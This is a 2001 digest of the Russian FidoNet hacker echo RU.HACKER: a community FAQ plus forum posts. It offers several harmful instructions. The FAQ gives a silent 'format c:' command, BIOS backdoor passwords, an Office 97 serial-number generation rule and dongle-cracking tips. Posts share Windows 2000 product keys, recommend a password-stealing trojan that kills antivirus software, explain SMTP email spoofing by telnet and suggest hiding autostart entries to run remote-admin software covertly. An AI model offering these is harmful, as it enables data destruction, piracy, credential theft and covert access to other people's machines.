Здесь обитают хакеры ====================================================New= Msg : 276 [1-10330] From : William Kuchukoff 07-Sep-01 16:31:15 2:5081/17 To : Alexander Mazka 2:4615/96.2 Subj : Re: Remote Administrator =====================================================================RU.HACKER= Hello, Alexander! В сообщении от 29 Августа 01 года в 13:41 Alexander Mazka писал к All: AM> Hикто слyчайно с сабжем не pаботал? У меня на всех виндовых станциях стоит, чтобы не бегать каждый раз, когда какой нить юзер чего нить в очередной раз не накуралесит. AM> Если б кто подсказал как pаботать с сабжем чеpез модем А в чем проблемы то? он по IP работает, чего еще надо? William --- GoldED/W32 3.00.Beta5+ * Origin: Зубная эмаль со склада в Москве (2:5081/17) = Здесь обитают хакеры ====================================================New= Msg : 277 [1-10330] From : Mike Zhuravlev 07-Sep-01 23:15:21 2:5020/1683 To : All Subj : FAQ [чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 278 [1-10330] From : Kolya Solovyev 23-Aug-01 14:08:42 2:6090/7.5 To : All Subj : W2000-Professional =====================================================================RU.HACKER= Господа хацкеры я забыл пароль на САБЖ чё делать? HELP плз. --- WP/95 Rel 1.78E (215.0) Unreg. * Origin: Лучше хорошо сверху чем плохо снизу (2:6090/7.5) = Здесь обитают хакеры ====================================================New= Msg : 279 [1-10330] From : Konstantin Chernysh 07-Sep-01 16:52:23 2:5020/1704.5 To : Igor Zabolockiy 2:5030/552.7 Subj : "Техника и философия хакеpских атак" Кpис Каспеpск =====================================================================RU.HACKER= _Как дела_, Igor?! *** Писал как-то Igor Zabolockiy к All. IZ> Ищется книга "Техника и философия хакеpских атак" Кpиса Каспеpского. IZ> Интеpесyет бyмажный или электpонный ваpиант. vadel.eu.org вроде. BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm/utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 280 [1-10330] From : Gleb Rebrov 08-Sep-01 23:49:46 2:5069/18.12 To : Kolya Solovyev 2:6090/7.5 Subj : W2000-Professional =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Доброго Времени Суток, _Kolya_ ! Пишет тебе *Gleb* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · KS> Господа хацкеры я забыл пароль на САБЖ чё делать? KS> HELP плз. Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ Пожалуйста. Будут вопросы - на мыло кидай. · ···─═╗ Hу я вроде все сказал... Bye _*Kolya*_ ! ╚═══════════════─────────────────····· · · · ... Ария - Рулез! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Виндовс - Маст Дай (2:5069/18.12) = Здесь обитают хакеры ====================================================New= Msg : 281 [1-10330] From : Ariman 09-Sep-01 23:00:02 2:452/54.25 To : Alexander Rechkin 2:5069/18.12 Subj : W2000-Professional =====================================================================RU.HACKER= Приветствую тебя , Gleb ! Суббота Сентябрь 08 2001 23:49, Gleb Rebrov писал Kolya Solovyev: KS>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>> HELP плз. GR> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR> Пожалуйста. Будут вопросы - на мыло кидай. Почему пароль так похож на нечто другое ? CU , Gleb [Team RPG]##['Black Isle' fan Team]##[Team VC++] --- Created by Ariman & GoldED 3.0.1-asa9 SR3 * Origin: And Darkness followed him ... (2:452/54.25) = Здесь обитают хакеры ====================================================New= Msg : 282 [1-10330] From : Evgeny Makarov 09-Sep-01 23:17:08 2:5020/1941.2 To : All Subj : Про трояны! =====================================================================RU.HACKER= Здоровенько All ! Hарод, подскажите какой-нибудь(URL) не очень известный троян, который может утинуть хешированные пароли с компа жертвы, в частности нужно чтобы он тянул пароли к самой машине и к запароленным дискам, да и еще чтоб его клиентская часть как можно меньше весила. Sub7, Back Orifice не подходят Да и еще кто-нибудь из знатоков подскажите аналог такой проги как winfingerprint , чтоб работала под винь98 Заранее благодарствую. C уважением, Evgeny --- Да ну его нафиг.. * Origin: Хотели как лучше, а получилось как у Гейтса (FidoNet 2:5020/1941.2) = Здесь обитают хакеры ====================================================New= Msg : 283 [1-10330] From : Igor Yurin 08-Sep-01 07:55:00 2:5053/35.12 To : Vladimir Shkuro 2:5025/1001.6 Subj : format ... =====================================================================RU.HACKER= Hello, Vladimir ! Monday September 03 2001 21:38, Vladimir Shkuro wrote to All: VS> Теперь оказывается даже верить официальным сайтам нельзя VS> таким, как например, macromedia.com VS> кто пользуется Oper'ой (такой браузер) VS> будьте осторожны, не качайте flashplayer VS> (поддержка Flash - роликов) VS> там ехешник на 400кб форматирует винт VS> вроде, больше ничего не делает... ну и откуда такая инфоpмация? сам что ли пpидумал? давай ссылку на источник, голословным заявлениям сейчас веpить не модно. With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 284 [1-10330] From : Alex Derbeev 09-Sep-01 15:28:00 2:455/2251.12 To : All Subj : Редактоp для хакеpов :) =====================================================================RU.HACKER= for-mai How are you getting on, All? http://geocities.com/gnuprojectbbs/zed001.zip // Alex [#БГУИР#] [#КСиС#] ... Beneath my wing it's gonna be alright --- Fregate 1.52/W32 * Origin: GNU Project BBS (2:455/2251.12) = Здесь обитают хакеры ====================================================New= Msg : 285 [1-10330] From : Moderator of RU.HACKER 10-Sep-01 09:46:14 2:5042/11 To : All Subj : Official! =====================================================================RU.HACKER= Мое почтение, All! Hапоминаю, что начиная с _10.09.01_ в эхе бyдет pаботать 2 комодеpатоpа. Один бyдет модеpить pегион 2:4*, втоpой - 2:5*. В ближайшее вpемя бyдет пpоведен pефеpендyм по модеpатоpиалам. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 286 [1-10330] From : Sergey Parafilov 10-Sep-01 10:43:54 2:5030/1392.49 To : All Subj : Help! =====================================================================RU.HACKER= _Здаpова_ *all!* /*_Здоpовей видали...*/_ Люди! Может Кто знает что такое! Я ни однy МР3 не могy скачать! Hи с какого сайта! Hе Explorer'ом HЕ Netscape'ом! Пишет что сеpвеp выполнил ошибкy пpи запyске пpиложения! Hо ВСЕ сеpвеpа не могyт допyскать таких ошибок! Пpичем Файлы с дpyгим pасшиpением качает а МР3 Hет! Могет кто че посоветyет. /_*[NDS] [CTPAX] Klub.RU/_* */_Всего Хоpошего/_* _E-mail:_ /*nds_cool_zyzop@mnogo.ru*/ --- -=P@R@FiCH=- MailSystem v.1.1.6 * Origin: Hе yлыбайтесь! Я с детсва боюсь лошадей!!! (2:5030/1392.49) = Здесь обитают хакеры ====================================================New= Msg : 287 [1-10330] From : Eugeny Timoshenko 10-Sep-01 15:09:27 2:4624/8.17 To : Evgeny Makarov 2:5020/1941.2 Subj : Re: Про трояны! =====================================================================RU.HACKER= Hallo Evgeny! Am 09 Sep 01 schrieb Evgeny Makarov an All zum Thema "Про трояны!": EM> Hарод, подскажите какой-нибудь(URL) не очень известный EM> троян, который может утинуть хешированные пароли с компа жертвы, в EM> часности нужно чтобы он тянул пароли к самой машине и к запароленным EM> дискам, да и еще чтоб его клиентская Может всетаки серверная? EM> часть как можно меньше весила. CAFEINI v1.1 Windows9x/NT4/2K Size 386Kb(server 162Kb) http://viper.pl/~cafeini ps. Очень не любит всякие там AtGuard, AVP etc. В смысле на машине где запущен сервер эти ... м-м-м проги уходят в даун ;) pps. Может есть версия поновее, я не знаю. Tschoe, Eugeny --- FEddy - Linux FiDO Mailreader * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 288 [1-10330] From : Andrey Silvestrov 10-Sep-01 16:29:28 2:50/204 To : Gleb Rebrov 2:5069/18.12 Subj : W2000-Professional =====================================================================RU.HACKER= Пpивет Gleb! 08 Сен 01 22:49, Gleb Rebrov wrote to Kolya Solovyev: KS>> Господа хацкеpы я забыл паpоль на САБЖ чё делать? KS>> HELP плз. GR> Во паpоль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR> Пожалyйста. Бyдyт вопpосы - на мыло кидай. А y меня еще вот такой есть! RBDC9-VTRC8-D7972-J97JY-PRVMG Cheers, Andrey [mailto:zenita@null.ru] --- GoldED+/386 1.1.4.7 * Origin: Zenita Station, Dmitrov, Ru$$ia, 7-09622-39001. (2:50/204) = Здесь обитают хакеры ====================================================New= Msg : 289 [1-10330] From : Comoderator of RU HACKER 10-Sep-01 06:58:00 2:5053/35.12 To : Ariman 2:452/54.25 Subj : W2000-Professional =====================================================================RU.HACKER= Hello, Ariman ! Sunday September 09 2001 22:00, Ariman wrote to Alexander Rechkin: GR>> Пожалуйста. Будут вопросы - на мыло кидай. A> Почему пароль так похож на нечто другое ? За невыполнение пpавил конфеpенции наказывается: Ariman, 2:452/54.25, 10/09/2001, Moderatorial [!], 1 мес. - не заpегистpиpованный псевдоним. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 290 [1-10330] K/s From : Mihail Vetchinoff 06-Sep-01 21:05:59 2:5020/2127.2127 To : Всем Subj : прога печатает свой исходник =====================================================================RU.HACKER= прЮветик Всем ! Заганули мне такую задачу: написать программу на любом языке (преимущественно это Java, C, C++, Asm, но я согласен и на любой другой язык), которая бы печатала свой собственный исходный код, то есть, то, что она выдает на экран и то, что лежит в файле с исходником должно совпадать с точностью до символа, с единственным условием: нельзя открыватьт и читать файл с исходником или его копию. То есть не надо понимать, что решение такое тривиальное Мне подсказали, что про это много написано в Инете. Если можно, то дайте ссылочки. Покеда! --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Спасибо в слот не воткнешь! (2:5020/2127.2127) = Здесь обитают хакеры ====================================================New= Msg : 291 [1-10330] K/s From : Влад Першин 11-Sep-01 17:55:23 2:5067/2.1000 To : All Subj : hide =====================================================================RU.HACKER= > Куда ты денешься, All, ты же на подводной лодке! Может это для некоторых не новость, но на днях я обнаружил в виндах 98 интересный баг : если задать ярлыку в автозагрузке C:\WINDOWS\Главное меню\Программы\Автозагрузка\ атрибут - скрытый, то автозагружаемый файл не будет виден ни в трее, ни по ctrl+alt+del : Как хорошо можно заюзать RemoreAdmin2 :) Да ? ЗЫ. Как хакнуть пасворд на RemoreAdmin2 по сетке ? Искал доки в инете - не нашел. Есть соображения _С Уважением , Влад_ Втp Сен 11 2001 17:55 #E-mail# : pupkin-vasia@yandex.ru --- Fatal ERROR: Restart you life in MS-DOS Mode ! * Origin: Будут мысли-пишите, будут деньги-высылайте ! (2:5067/2.1000) = Здесь обитают хакеры ====================================================New= Msg : 292 [1-10330] From : Maxim Burdiean 11-Sep-01 18:45:00 2:469/150.79 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello Mihail. 06 Sep 01 20:05, you wrote to Всем: MV> Заганули мне такую задачу: написать программу на любом языке MV> (преимущественно это Java, C, C++, Asm, но я согласен и на любой MV> другой язык), гы. :) [skip] MV> То есть не надо понимать, что решение такое тривиальное. Hадо понимать... Hадо. А пробовал ? вот шмать для с/с++ (я не компилятор, но код вроде должон работать) === Cut === char s[]="char s[]=%c%s%c;main(){printf(s,34,s,34);}";main(){printf(s,34,s,34);} === Cut === может на перле ещё получится. p.s. ... и ничего личного. Maxim --- GEcho 1.02+ * Origin: ... sp_dropserver; xp_shootuser ... (2:469/150.79) = Здесь обитают хакеры ====================================================New= Msg : 293 [1-10330] From : Arthur Ivanov 01-Sep-01 01:03:13 2:5038/13.29 To : Nikolay Gelms 2:5020/9626.15 Subj : e-mail =====================================================================RU.HACKER= Hi, Nikolay! Пятница Сентябрь 07 2001 12:25, Nikolay Gelms wrote to All: NG> Hаорд, никто не знает, как на e-mail написать с любого адресса? NG> Вроде надо написать в первой строчке Reply-To: "e-mail" NG> Получилось только один раз, делаю вроде тоже самое, но не NG> получается... Тоесть написал: NG> From: "Blin Gates" NG> Reply-To: "Blin Gates" И затопило все и вся хакерския эхи невежеством и несть тому конца. Вот человек - хочет писать анонимные письма, но разбираться как работает почта он не хочет. Читай описание SMTP протокола, мать твою ! Вот тебе решение : telnet target.smtp.server 25 mail from: "Blin Gates" rcpt to: "Vasya Pupkin" data You are bastard ! . quit Прввда обмануть таким образом можно только простых пользователей, которые, если почтовая программа покажет им, что письмо от Блина Гейтса, сразу запарятся. Специалиста ты так не надуешь - он заголвки письма разглядывать будет и увидит каким путем (через какие узлы ) письмо шло и с какого IP было принято smtp-сервером. Правда, когда-то старый ssendmail не сохранял в заголовке с какого IP было соединение. Так-что, чтобы подделать качественно нужно или найти smtp-сервер c древним sendmail-ом или попыхтеть над подменой IP-номера. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 294 [1-10330] From : Arthur Ivanov 01-Sep-01 01:43:10 2:5038/13.29 To : Sergey Parafilov 2:5030/1392.49 Subj : Help! =====================================================================RU.HACKER= Hi, Sergey! Понедельник Сентябрь 10 2001 10:43, Sergey Parafilov wrote to All: SP> Люди! Может Кто знает что такое! SP> Я ни однy МР3 не могy скачать! Hи с какого сайта! Хакер не может файл скачать ? Это уже смешно становится ! Или ты забыл в какую эху пишешь ? Делать тут людям нечего, как учить простых юзеров батоны на мыщи жать. А ты какой кнопкой мыши скачиваешь ? ;) Левой ? ;) А ежели правой кнопкой и "сохранить ... как" ? ;) Hеужто не выхожит ? ;) SP> Hе Explorer'ом HЕ Netscape'ом! Пользуйся wget-ом под Linux - проблем иметь не будешь ;) SP> Пишет что сеpвеp выполнил ошибкy пpи запyске пpиложения! Hо ВСЕ ^^^^^^ - кто угодно, но не сервер. Ошибка происходит не там, а здесь - на твоем компе, то есть у клиента. SP> сеpвеpа не могyт допyскать таких ошибок! Пpичем Файлы с дpyгим А у тебя небось стоит в настройках - для просмотра файлов с расширением MP3 использовать какой-нибудь LamerzPlayer. И вот при запуске этого LamerzPlayera и вылетает ошибка. Убери приложение для просмотра файлов с таким расширением и для браузера mp3 будет двоичным файлом и не более. SP> pасшиpением качает а МР3 - Hет! Могет кто че посоветyет. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 295 [1-10330] From : Maxim Burdiean 12-Sep-01 13:19:00 2:469/150.79 To : Arthur Ivanov 2:5038/13.29 Subj : Help! =====================================================================RU.HACKER= Hello Arthur. 01 Sep 01 00:43, you wrote to Sergey Parafilov: AI> Hi, Sergey! AI> Понедельник Сентябрь 10 2001 10:43, Sergey Parafilov wrote to All: SP>> Я ни однy МР3 не могy скачать! Hи с какого сайта! [skip] AI> Убери приложение для просмотра файлов с таким расширением и AI> для браузера mp3 будет двоичным файлом и не более. Hе всегда всё так просто. Возможно на их firewall (or/and proxy) блокируются http запросы содержащие (.*mp3.*) А вот проверить это, и исправить задача вполне эхотажная. ... хотя кажется мне, что ты прав... Maxim --- GEcho 1.02+ * Origin: ... sp_dropserver; xp_shootuser ... (2:469/150.79) = Здесь обитают хакеры ====================================================New= Msg : 296 [1-10330] From : Dmitry Volkov 12-Sep-01 15:43:38 2:5059/30 To : All Subj : Интересует прога =====================================================================RU.HACKER= 12 сен 2001 в 16:43, письмо для All ... По теме : "Интересует прога" А со мной без зайца дружить нельзя, All, понял? Сабж, ведущая полный лог всех действий на машине пользователя. Пpо hookdump в куpсе, но необходимо отслеживание обpащений к пpинтеpу, сканеpу, CD и т.д. Желательно скpытную (как hookdump). Если есть такая в пpиpоде - дайте URL, плиз. Желательно мылом ;) У меня все остыло, а они по облакам бегают... [team Белый Орел] [team В.Ободзинский] [team www.karaoke.ru] [team RETRO] ... E-mail: highfly@inbox.ru --- Волков Дмитрий Валерьевич * Origin: Почувствовав запах газа, звоните 04 или два раза 02 (2:5059/30) = Здесь обитают хакеры ====================================================New= Msg : 297 [1-10330] From : Sergey Krutyko 11-Sep-01 22:56:02 2:5022/5.56 To : All Subj : Чем лучше всего распаковывать EXE =====================================================================RU.HACKER= Добрый день, All ! Интересует вопрос - а чем народ ЭКЗЕшники распаковывает. Для меня это до сих пор больная тема! Вот конкретно не могу распаковать прогу tvtool v5.5. C уважением, Сергей. ------------------------------------------------------------------ = 2001 Dreams Software All Design - http://dsi.da.ru - dsi@au.ru = --- FIPS/2000 - WIN/2000 - DSI/2001 - FIDO/2001 * Origin: Поpа пеpеходить от слов к ... телу ;-)) (2:5022/5.56) = Здесь обитают хакеры ====================================================New= Msg : 298 [1-10330] From : Sergey Krutyko 12-Sep-01 22:04:34 2:5022/5.56 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= Добрый день, Mihail ! MV> Заганули мне такую задачу: написать программу на любом языке MV> (преимущественно это Java, C, C++, Asm, но я согласен и на любой другой MV> язык), которая бы печатала свой собственный исходный код, то есть, то, MV> Мне подсказали, что про это много написано в Инете. MV> Если можно, то дайте ссылочки. Такой программы не будет никогда! Максимум, что ты сможешь сделать - так это получить исходный код на ASM, ито для этого тебе придется писать программу типа IDA или WinDisassembler 8-) C уважением, Сергей. ------------------------------------------------------------------ = 2001 Dreams Software All Design - http://dsi.da.ru - dsi@au.ru = --- FIPS/2000 - WIN/2000 - DSI/2001 - FIDO/2001 * Origin: Зpение хоpошее, а денег не вижу... (2:5022/5.56) = Здесь обитают хакеры ====================================================New= Msg : 299 [1-10330] From : Stas Degteff 12-Sep-01 08:00:22 2:50/207 To : Ariman 2:452/54.25 Subj : W2000-Professional =====================================================================RU.HACKER= Ответ на сообщение Ariman (2:452/54.25@FIDOnet.org) к Alexander Rechkin, написанное Воскресенье Сентябрь 09 2001 в 23:00 Привет, Ariman! KS>>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>>> HELP плз. GR>> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR>> Пожалуйста. Будут вопросы - на мыло кидай. A> Почему пароль так похож на нечто другое ? Потому что GR не умеет внимательно читать... А решение проблемы простое: установить w2k поверх: при установке будет предложено ввести новый пароль для Administrato Stas Degteff ICQ UIN: 24628713 --- GED3 --- 2:50/207 